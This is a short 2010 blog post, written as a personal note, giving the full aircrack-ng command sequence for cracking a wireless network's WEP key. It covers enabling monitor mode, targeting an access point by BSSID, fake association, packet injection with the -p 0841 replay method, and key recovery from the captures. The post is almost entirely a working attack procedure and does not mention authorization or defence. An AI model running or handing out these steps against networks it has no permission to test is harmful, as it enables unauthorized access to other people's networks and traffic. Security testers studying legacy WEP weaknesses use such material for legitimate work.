Wednesday, November 03, 2010

Aircrack Quick Tutorial (Wireless WEP Cracking)

Speaking of wireless. The following is just a quick note-to-self, because I always forget the exact commands and end up crawling around the Aircrack wiki for a bit. I though I'd posted this before, but I can't seem to find it.

TTY1$ sudo airmon-ng start eth1
# Assume monitor started on mon0.
TTY1$ sudo airodump-ng mon0
# Scout interesting APs and focus:
TTY1$ sudo airodump-ng --channel X --bssid XX:XX:XX:XX:XX:XX -w output mon0
# OK, this terminal is dumping data. Open a new one.

TTY2$ sudo aireplay-ng -1 0 -a XX:XX:XX:XX:XX:XX mon0
# ... Association successful :-)

# Now start the attack. I like opening a new terminal for this.
# Don't bother with the ARP request replay attack.
# The best method to use is the -p 0841 one, especially when using
# a crappy wifi chip like me (3945ABG). Last time I checked, the
# advanced attack methods (KoreK chopchop, fragmentation, caffe-
# latte and Hirte) didn't work.
TTY3$ sudo aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b XX:XX:XX:XX:XX:XX mon0

# Wait until a packet is captured. It's best to use a small one (Size: 68).
# Reinject and the data-counter in TTY1 (airodump) should go up. Now get cracking:
TTY4$ sudo aircrack-ng -b XX:XX:XX:XX:XX:XX output*.cap

#And, optional:
TTY5$ sudo aircrack-ng -K -b XX:XX:XX:XX:XX:XX output*.cap